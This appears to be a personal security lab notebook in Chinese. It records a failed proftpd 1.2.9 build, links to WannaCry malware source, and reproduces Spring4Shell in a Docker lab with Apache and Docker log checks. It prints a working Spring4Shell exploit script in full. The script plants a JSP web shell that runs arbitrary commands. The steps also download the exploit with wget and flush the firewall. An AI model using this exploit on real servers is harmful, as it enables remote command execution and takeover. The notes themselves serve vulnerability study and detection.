warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 444 | res = (uid_t) mr->data; | ^ auth.c: In function ‘auth_name_gid’: auth.c:465:11: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 465 | res = (gid_t) mr->data; | ^ auth.c: In function ‘auth_getgroups’: auth.c:497:11: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 497 | res = (int) mr->data; | ^ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c fsio.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mkhome.c make[1]: Leaving directory '/home/iris/Downloads/proftpd-1.2.9/src' cd modules/ && make modules make[1]: Entering directory '/home/iris/Downloads/proftpd-1.2.9/modules' gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_core.c mod_core.c: In function ‘set_masqueradeaddress’: mod_core.c:728:15: warning: variable ‘c’ set but not used [-Wunused-but-set-variable] 728 | config_rec *c = NULL; | ^ mod_core.c: In function ‘add_virtualhost’: mod_core.c:2571:17: warning: variable ‘addr’ set but not used [-Wunused-but-set-variable] 2571 | pr_netaddr_t *addr = NULL; | ^~~~ mod_core.c: In function ‘format_size_str’: mod_core.c:2674:25: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 2674 | snprintf(buf, buflen, "%.3" PR_LU "%cB", size, units[i]); | ^~~~~ ~~~~ | | | off_t {aka long int} In file included from mod_core.c:31: ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c: In function ‘core_display_file’: mod_core.c:2705:38: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 2705 | snprintf(mg_size, sizeof(mg_size), "%" PR_LU, fs_size); | ^~~ ~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c:2752:50: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 2752 | snprintf(mg_xfer_bytes, sizeof(mg_xfer_bytes), "%" PR_LU, | ^~~ 2753 | session.total_bytes >> 10); | ~~~~~~~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c:2754:50: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 2754 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "B", | ^~~ 2755 | session.total_bytes); | ~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c:2758:52: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 2758 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "kB", | ^~~ 2759 | session.total_bytes >> 10); | ~~~~~~~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c:2762:52: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 2762 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "MB", | ^~~ 2763 | session.total_bytes >> 20); | ~~~~~~~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c:2766:52: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 2766 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "GB", | ^~~ 2767 | session.total_bytes >> 30); | ~~~~~~~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c: In function ‘core_size’: mod_core.c:3877:30: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 3 has type ‘__off_t’ {aka ‘ long int’} [-Wformat=] 3877 | pr_response_add(R_213, "%" PR_LU, sbuf.st_size); | ^~~ ~~~~~~~~~~~~ | | | __off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_core.c: In function ‘core_mdtm’: mod_core.c:3844:41: warning: ‘%02d’ directive output may be truncated writing between 2 and 11 bytes into a region of size between 5 and 12 [-Wformat-truncation=] 3844 | snprintf(buf, sizeof(buf), "%04d%02d%02d%02d%02d%02d", | ^~~~ mod_core.c:3844:36: note: directive argument in the range [-2147483647, 2147483647] 3844 | snprintf(buf, sizeof(buf), "%04d%02d%02d%02d%02d%02d", | ^~~~~~~~~~~~~~~~~~~~~~~~~~ mod_core.c:3844:9: note: ‘snprintf’ output between 15 and 67 bytes into a destination of size 16 3844 | snprintf(buf, sizeof(buf), "%04d%02d%02d%02d%02d%02d", | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 3845 | tm->tm_year+1900,tm->tm_mon+1,tm->tm_mday, | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 3846 | tm->tm_hour,tm->tm_min,tm->tm_sec); | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ mod_core.c: In function ‘core_display_file’: mod_core.c:2758:52: warning: ‘%llu’ directive output may be truncated writing between 2 and 16 bytes into a region of size 12 [-Wformat-truncation=] 2758 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "kB", | ^~~ mod_core.c:2758:53: note: format string is defined here 2758 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "kB", mod_core.c:2758:52: note: directive argument in the range [10, 9007199254740991] 2758 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "kB", | ^~~ mod_core.c:2758:5: note: ‘snprintf’ output between 5 and 19 bytes into a destination of size 12 2758 | snprintf(mg_xfer_units, sizeof(mg_xfer_units), "%" PR_LU "kB", | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 2759 | session.total_bytes >> 10); | ~~~~~~~~~~~~~~~~~~~~~~~~~~ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_xfer.c mod_xfer.c: In function ‘_log_transfer’: mod_xfer.c:258:21: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 258 | log_debug(DEBUG1, "Transfer %s %" PR_LU " bytes in %ld.%02lu seconds", | ^~~~~~~~~~~~~~~ 259 | abort_flag == 'c' ? "completed:" : "aborted after", 260 | session.xfer.total_bytes, (long) end_time.tv_sec, | ~~~~~~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} In file included from mod_xfer.c:32: ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_xfer.c: In function ‘xfer_rate_lookup’: mod_xfer.c:413:23: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 413 | log_debug(DEBUG3, "TransferRate (%.3Lf KB/s, %" PR_LU | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 414 | " bytes free) in effect%s", xfer_rate_kbps, xfer_rate_freebytes, | ~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_xfer.c: In function ‘xfer_stor’: mod_xfer.c:1293:26: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 3 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 1293 | log_pri(PR_LOG_INFO, "MaxStoreFileSize (%" PR_LU " byte%s) reached: " | ^~~~~~~~~~~~~~~~~~~~~ 1294 | "aborting transfer of '%s'", nbytes_max_store, | ~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_xfer.c:1320:28: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 3 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 1320 | log_pri(PR_LOG_INFO, "MaxStoreFileSize (%" PR_LU " bytes) reached: " | ^~~~~~~~~~~~~~~~~~~~~ 1321 | "aborting transfer of '%s'", nbytes_max_store, dir); | ~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_xfer.c: In function ‘xfer_retr’: mod_xfer.c:1565:26: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 3 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 1565 | log_pri(PR_LOG_INFO, "MaxRetrieveFileSize (%" PR_LU " byte%s) reached: " | ^~~~~~~~~~~~~~~~~~~~~~~~ 1566 | "aborting transfer of '%s'", nbytes_max_retrieve, | ~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_auth_unix.c mod_auth_unix.c: In function ‘pw_getpwuid’: mod_auth_unix.c:373:9: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 373 | uid = (uid_t)cmd->argv[0]; | ^ mod_auth_unix.c: In function ‘pw_getgrgid’: mod_auth_unix.c:421:9: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 421 | gid = (gid_t)cmd->argv[0]; | ^ mod_auth_unix.c: In function ‘pw_uid_name’: mod_auth_unix.c:780:12: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 780 | id.uid = (uid_t) cmd->argv[0]; | ^ mod_auth_unix.c: In function ‘pw_gid_name’: mod_auth_unix.c:811:12: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 811 | id.gid = (gid_t) cmd->argv[0]; | ^ mod_auth_unix.c: In function ‘pw_name_uid’: mod_auth_unix.c:852:33: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 852 | return mod_create_data(cmd, (void *) pw->pw_uid); | ^ mod_auth_unix.c: In function ‘pw_name_gid’: mod_auth_unix.c:869:33: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 869 | return mod_create_data(cmd, (void *) gr->gr_gid); | ^ mod_auth_unix.c: In function ‘pw_getgroups’: mod_auth_unix.c:950:33: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 950 | return mod_create_data(cmd, (void *) gids->nelts); | ^ mod_auth_unix.c:953:33: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 953 | return mod_create_data(cmd, (void *) groups->nelts); | ^ mod_auth_unix.c: In function ‘pw_uid_name’: mod_auth_unix.c:798:38: warning: ‘snprintf’ output may be truncated before the last format character [-Wformat-truncation=] 798 | snprintf(buf, sizeof(buf), "%lu", (unsigned long) id.uid); | ^ mod_auth_unix.c:798:7: note: ‘snprintf’ output between 2 and 11 bytes into a destination of size 10 798 | snprintf(buf, sizeof(buf), "%lu", (unsigned long) id.uid); | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ mod_auth_unix.c: In function ‘pw_gid_name’: mod_auth_unix.c:832:38: warning: ‘snprintf’ output may be truncated before the last format character [-Wformat-truncation=] 832 | snprintf(buf, sizeof(buf), "%lu", (unsigned long) id.gid); | ^ mod_auth_unix.c:832:7: note: ‘snprintf’ output between 2 and 11 bytes into a destination of size 10 832 | snprintf(buf, sizeof(buf), "%lu", (unsigned long) id.gid); | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_auth_file.c mod_auth_file.c: In function ‘authfile_getpwuid’: mod_auth_file.c:632:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 632 | uid_t uid = (uid_t) cmd->argv[0]; | ^ mod_auth_file.c: In function ‘authfile_name2uid’: mod_auth_file.c:658:37: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 658 | return pwd ? mod_create_data(cmd, (void *) pwd->pw_uid) : DECLINED(cmd); | ^ mod_auth_file.c: In function ‘authfile_uid2name’: mod_auth_file.c:686:43: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 686 | pwd = af_getpwuid(af_current_user_file, (uid_t) cmd->argv[0]); | ^ mod_auth_file.c: In function ‘authfile_getgrgid’: mod_auth_file.c:719:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 719 | gid_t gid = (gid_t) cmd->argv[0]; | ^ mod_auth_file.c: In function ‘authfile_getgroups’: mod_auth_file.c:824:33: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 824 | return mod_create_data(cmd, (void *) gids->nelts); | ^ mod_auth_file.c:827:33: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 827 | return mod_create_data(cmd, (void *) groups->nelts); | ^ mod_auth_file.c: In function ‘authfile_gid2name’: mod_auth_file.c:842:44: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast] 842 | grp = af_getgrgid(af_current_group_file, (gid_t) cmd->argv[0]); | ^ mod_auth_file.c: In function ‘authfile_name2gid’: mod_auth_file.c:859:37: warning: cast to pointer from integer of different size [-Wint-to-pointer-cast] 859 | return grp ? mod_create_data(cmd, (void *) grp->gr_gid) : DECLINED(cmd); | ^ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_auth.c mod_auth.c: In function ‘auth_count_scoreboard’: mod_auth.c:1496:9: warning: variable ‘origuser’ set but not used [-Wunused-but-set-variable] 1496 | char *origuser, config_class_users[128] = {'\0'}; | ^~~~~~~~ mod_auth.c: In function ‘set_anonrejectpasswords’: mod_auth.c:1993:15: warning: variable ‘c’ set but not used [-Wunused-but-set-variable] 1993 | config_rec *c = NULL; | ^ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_ls.c mod_ls.c: In function ‘listfile’: mod_ls.c:447:13: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 8 has type ‘__off_t’ {aka ‘long int’} [-Wformat=] 447 | "%s %3d %-8s %-8s %8" PR_LU " %s %2d %s %s", m, (int) st.st_nlink, | ^~~~~~~~~~~~~~~~~~~~~ 448 | MAP_UID(st.st_uid), MAP_GID(st.st_gid), st.st_size, | ~~~~~~~~~~ | | | __off_t {aka long int} In file included from mod_ls.c:31: ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_ls.c:455:13: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 8 has type ‘__off_t’ {aka ‘long int’} [-Wformat=] 455 | "%s %3d %-8u %-8u %8" PR_LU " %s %2d %s %s", m, (int) st.st_nlink, | ^~~~~~~~~~~~~~~~~~~~~ 456 | (unsigned) st.st_uid, (unsigned) st.st_gid, st.st_size, | ~~~~~~~~~~ | | | __off_t {aka long int} ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" mod_ls.c: In function ‘listdir’: mod_ls.c:825:17: warning: variable ‘ignore_hidden’ set but not used [-Wunused-but-set-variable] 825 | unsigned char ignore_hidden = FALSE; | ^~~~~~~~~~~~~ mod_ls.c: In function ‘listfile’: mod_ls.c:437:49: warning: ‘%5d’ directive output may be truncated writing between 5 and 11 bytes into a region of size 6 [-Wformat-truncation=] 437 | snprintf(timeline, sizeof(timeline), "%5d", t->tm_year+1900); | ^~~ mod_ls.c:437:48: note: directive argument in the range [-2147481748, 2147483647] 437 | snprintf(timeline, sizeof(timeline), "%5d", t->tm_year+1900); | ^~~~~ mod_ls.c:437:11: note: ‘snprintf’ output between 6 and 12 bytes into a destination of size 6 437 | snprintf(timeline, sizeof(timeline), "%5d", t->tm_year+1900); | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In function ‘pop_cwd’, inlined from ‘nlstdir’ at mod_ls.c:1612:5: mod_ls.c:155:3: warning: ‘symhold’ may be used uninitialized [-Wmaybe-uninitialized] 155 | pr_fsio_chdir(_cwd, *symhold); | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~ mod_ls.c: In function ‘nlstdir’: mod_ls.c:1465:17: note: ‘symhold’ was declared here 1465 | unsigned char symhold; | ^~~~~~~ At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_log.c mod_log.c: In function ‘get_next_meta’: mod_log.c:550:35: warning: format ‘%llu’ expects argument of type ‘long long unsigned int’, but argument 4 has type ‘off_t’ {aka ‘long int’} [-Wformat=] 550 | snprintf(argp, sizeof(arg), "%" PR_LU, session.xfer.total_bytes); | ^~~ ~~~~~~~~~~~~~~~~~~~~~~~~ | | | off_t {aka long int} In file included from mod_log.c:31: ../include/conf.h:309:20: note: format string is defined here 309 | # define PR_LU "llu" At top level: cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_site.c gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c mod_cap.c srcdir=. ./glue.sh mod_core.o mod_xfer.o mod_auth_unix.o mod_auth_file.o mod_auth.o mod_ls.o mod_log.o mod_site.o mod_cap.o gcc -DLINUX -I.. -I../include -O2 -Wall -Wno-long-double -c module_glue.c make[1]: Leaving directory '/home/iris/Downloads/proftpd-1.2.9/modules' make[1]: Entering directory '/home/iris/Downloads/proftpd-1.2.9/lib/libcap' => making cap_names.c from <linux/capability.h> cc -O2 -Wall -Wno-long-double -Llib _makenames.c -o _makenames ./_makenames > cap_names.h cc -O2 -Wall -Wno-long-double -c cap_alloc.c -o cap_alloc.o cc -O2 -Wall -Wno-long-double -c cap_proc.c -o cap_proc.o cc -O2 -Wall -Wno-long-double -c cap_extint.c -o cap_extint.o cc -O2 -Wall -Wno-long-double -c cap_flag.c -o cap_flag.o cc -O2 -Wall -Wno-long-double -c cap_text.c -o cap_text.o cc -O2 -Wall -Wno-long-double -c cap_sys.c -o cap_sys.o cap_sys.c:14:16: error: expected declaration specifiers or ‘...’ before ‘capget’ 14 | _syscall2(int, capget, | ^~~~~~ cap_sys.c:15:30: error: unknown type name ‘header’ 15 | cap_user_header_t, header, | ^~~~~~ cap_sys.c:16:28: error: unknown type name ‘data’ 16 | cap_user_data_t, data) | ^~~~ cc1: note: unrecognized command-line option ‘-Wno-long-double’ may have been intended to silence earlier diagnostics make[1]: *** [Makefile:43: cap_sys.o] Error 1 make[1]: Leaving directory '/home/iris/Downloads/proftpd-1.2.9/lib/libcap' make: *** [Makefile:46: dirs] Error 2 ``` Error code ![image](https://hackmd.io/_uploads/SJEwwM5eC.png) # Windows Wannacry(EternalBlue),RCE ### 不是直接透過載本體來執行 Malware本體: * [limiteci/WannaCry](https://github.com/limiteci/WannaCry) 相關文章: [Demystifying WannaCry: A Deep Dive into Malware Analysis](https://medium.com/@s.shrimeenaakshi/demystifying-wannacry-a-deep-dive-into-malware-analysis-03a10a0b1f40) [HuskyHacks / PMAT-labs](https://github.com/HuskyHacks/PMAT-labs/tree/main/labs/4-1.Bossfight-wannacry.exe) `ssh -i "C:\Users\iris.yu\Downloads\VMKali.pem" kali@ec2-54-149-82-215.us-west-2.compute.amazonaws.com` `nano /var/ossec/etc/rules/local_rules.xml` --- # Spring4Shell CVE-2022-22965 [[漏洞分析] 002 復現 Spring4Shell: Spring Core RCE JDK 9+ CVE-2022-22965](https://feifei.tw/springshell-spring-core-rce/) ## 確認連線狀態與關閉防火牆 * 關閉防火牆 ``` ┌──(root㉿kali)-[/home/iris/Downloads] └─# sudo iptables -F ┌──(root㉿kali)-[/home/iris/Downloads] └─# sudo iptables -X ┌──(root㉿kali)-[/home/iris/Downloads] └─# sudo iptables -P INPUT ACCEPT ┌──(root㉿kali)-[/home/iris/Downloads] └─# sudo iptables -P FORWARD ACCEPT ┌──(root㉿kali)-[/home/iris/Downloads] └─# sudo iptables -P OUTPUT ACCEPT ``` * 確認Port監聽狀態/Ping ``` ┌──(root㉿kali)-[/home/iris/Downloads] └─# netstat -tuln Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 127.0.0.1:46619 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:8066 0.0.0.0:* LISTEN tcp6 0 0 ::1:3350 :::* LISTEN tcp6 0 0 :::22 :::* LISTEN tcp6 0 0 :::8066 :::* LISTEN tcp6 0 0 :::3389 :::* LISTEN udp 0 0 0.0.0.0:68 0.0.0.0:* udp6 0 0 fe80::449:30ff:fe6c:546 :::* ┌──(root㉿kali)-[/home/iris/Downloads] └─# ping 172.104.100.165 PING 172.104.100.165 (172.104.100.165) 56(84) bytes of data. 64 bytes from 172.104.100.165: icmp_seq=1 ttl=48 time=125 ms 64 bytes from 172.104.100.165: icmp_seq=2 ttl=48 time=125 ms ``` ## 發現問題: * 應該是http://127.104.100.165:8066/ * 而不是http://172.104.100.165:8066/ ## 整體操作步驟 ### 載docker image `docker pull vulfocus/spring-core-rce-2022-03-29:latest` ### 開8066:8080執行 * 到網站可以看到ok,代表運行成功 `docker run -p 8066:8080 vulfocus/spring-core-rce-2022-03-29:latest` ![image](https://hackmd.io/_uploads/Bkw-ODclC.png) ### 載攻擊腳本 `wget https://raw.githubusercontent.com/dinosn/spring-core-rce/main/test.py` ### 執行攻擊腳本 `python3 test.py --url http://127.104.100.165:8066/` ``` #coding:utf-8 import requests import argparse from urllib.parse import urljoin def Exploit(url): headers = {"suffix":"%>//", "c1":"Runtime", "c2":"<%", "DNT":"1", "Content-Type":"application/x-www-form-urlencoded" } data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" try: go = requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False) shellurl = urljoin(url, 'tomcatwar.jsp') shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False) if shellgo.status_code == 200: print(f"漏洞存在,shell地址为:{shellurl}?pwd=j&cmd=whoami") except Exception as e: print(e) pass def main(): parser = argparse.ArgumentParser(description='Srping-Core Rce.') parser.add_argument('--file',help='url file',required=False) parser.add_argument('--url',help='target url',required=False) args = parser.parse_args() if args.url: Exploit(args.url) if args.file: with open (args.file) as f: for i in f.readlines(): i = i.strip() Exploit(i) if __name__ == '__main__': main() ``` ### 觀察漏洞執行 網址:`http://127.104.100.165:8066/tomcatwar.jsp?pwd=j&cmd=whoami` ![image](https://hackmd.io/_uploads/S1C__D5e0.png) # 相關資料 [修改資訊 spring-projects/spring-framework](https://github.com/spring-projects/spring-framework/tags) ![image](https://hackmd.io/_uploads/HJfjpDqxC.png) # Log大戰 * 開啟conf文檔 `sudo nano /etc/apache2/apache2.conf` * nano 加入`CustomLog ${APACHE_LOG_DIR}/access.log combined` ![image](https://hackmd.io/_uploads/H183N_9l0.png) * 重新啟動apache `sudo systemctl restart apache2` * access log命令 `sudo cat /var/log/apache2/access.log` * error log命令 `sudo cat /var/log/apache2/error.log` * 檢查status命令 `sudo systemctl status apache2` ![image](https://hackmd.io/_uploads/B1iWM_ce0.png) * 印出所有log文檔 `ls /var/log/` ``` ──(kali㉿kali)-[~] └─$ ls /var/log/ README clamav faillog lastlog private sysstat alternatives.log cloud-init-output.log fontconfig.log lightdm redis tiger apache2 cloud-init.log freeradius lighttpd redsnarf tor apt cron.log freeradius-wpe macchanger.log runit unattended-upgrades auth.log defectdojo gvm mosquitto samba user.log blue_hydra dpkg.log hostapd-wpe nginx snort wtmp boot.log dradis inetsim notus-scanner speech-dispatcher xrdp-sesman.log btmp eaphammer journal openvpn stunnel4 xrdp.log chkrootkit exim4 kern.log postgresql syslog ``` ![image](https://hackmd.io/_uploads/BJIc9_9g0.png) ## Error/Access log checking 輸入error code有兩條訊息,只第一行是 Apache 的通知訊息,指示 Apache 已經配置完成,恢復正常運作。第二行是關於 Apache 主進程的通知 ``` ┌──(root㉿kali)-[/var/log/apache2] └─# sudo cat /var/log/apache2/error.log [Mon Apr 15 09:21:04.055498 2024] [mpm_prefork:notice] [pid 251144] AH00163: Apache/2.4.58 (Debian) configured -- resuming normal operations [Mon Apr 15 09:21:04.055553 2024] [core:notice] [pid 251144] AH00094: Command line: '/usr/sbin/apache2' ``` ![image](https://hackmd.io/_uploads/rJ89HOqlA.png) ## 另外載 [fullhunt/spring4shell-scan](https://github.com/fullhunt/spring4shell-scan) ``` git clone https://github.com/fullhunt/spring4shell-scan.git cd spring4shell-scan sudo docker build -t spring4shell-scan . sudo docker run -it --rm spring4shell-scan # With URL list "urls.txt" in current directory docker run -it --rm -v $PWD:/data spring4shell-scan -l /data/urls.txt ``` * 指令執行 `python3 spring4shell-scan.py -u http://127.104.100.165:8066/` * 掃描畫面(有洞) ``` ┌──(root㉿kali)-[/home/iris/Downloads/spring4shell-scan/spring4shell-scan] └─# python3 spring4shell-scan.py -u http://127.104.100.165:8066/ [•] CVE-2022-22965 - Spring4Shell RCE Scanner [•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. [•] Secure your External Attack Surface with FullHunt.io. [•] URL: http://127.104.100.165:8066/ [%] Checking for Spring4Shell RCE CVE-2022-22965. [•] URL: http://127.104.100.165:8066/ | PAYLOAD: class.module.classLoader[iv1jdve]=iv1jdve [!!!] Target Affected (CVE-2022-22965) [!] Total Vulnerable Hosts: 1 [!] http://127.104.100.165:8066/ ``` ![image](https://hackmd.io/_uploads/S1aT_O5lC.png) ## Docker Log `docker ps`: 找Container id ![image](https://hackmd.io/_uploads/BJsmRi2gA.png) ``` ┌──(root㉿kali)-[/home/iris/Downloads] └─# docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 233ab001aa5a vulfocus/spring-core-rce-2022-03-29:latest "/app/tomcat/bin/cat…" 3 minutes ago Up 3 minutes 0.0.0.0:8066->8080/tcp, :::8066->8080/tcp distracted_joliot ``` ### 看到Log了!😂 `docker logs 233ab001aa5a` ![image](https://hackmd.io/_uploads/HkgZCihxA.png) ``` ┌──(root㉿kali)-[/home/iris/Downloads] └─# docker logs 233ab001aa5a NOTE: Picked up JDK_JAVA_OPTIONS: --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED 17-Apr-2024 01:55:52.641 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Server version name: Apache Tomcat/8.5.77 17-Apr-2024 01:55:52.647 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Server built: Mar 13 2022 19:13:33 UTC 17-Apr-2024 01:55:52.647 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Server version number: 8.5.77.0 17-Apr-2024 01:55:52.648 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log OS Name: Linux 17-Apr-2024 01:55:52.648 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log OS Version: 6.6.9-cloud-amd64 17-Apr-2024 01:55:52.649 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Architecture: amd64 17-Apr-2024 01:55:52.649 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Java Home: /app/jdk9 17-Apr-2024 01:55:52.650 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log JVM Version: 9.0.4+11 17-Apr-2024 01:55:52.650 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log JVM Vendor: Oracle Corporation 17-Apr-2024 01:55:52.650 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_BASE: /app/tomcat 17-Apr-2024 01:55:52.651 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_HOME: /app/tomcat 17-Apr-2024 01:55:52.656 INFO [main] org.apache.catalina.startup.VersionLoggerListener.log Command line argument: 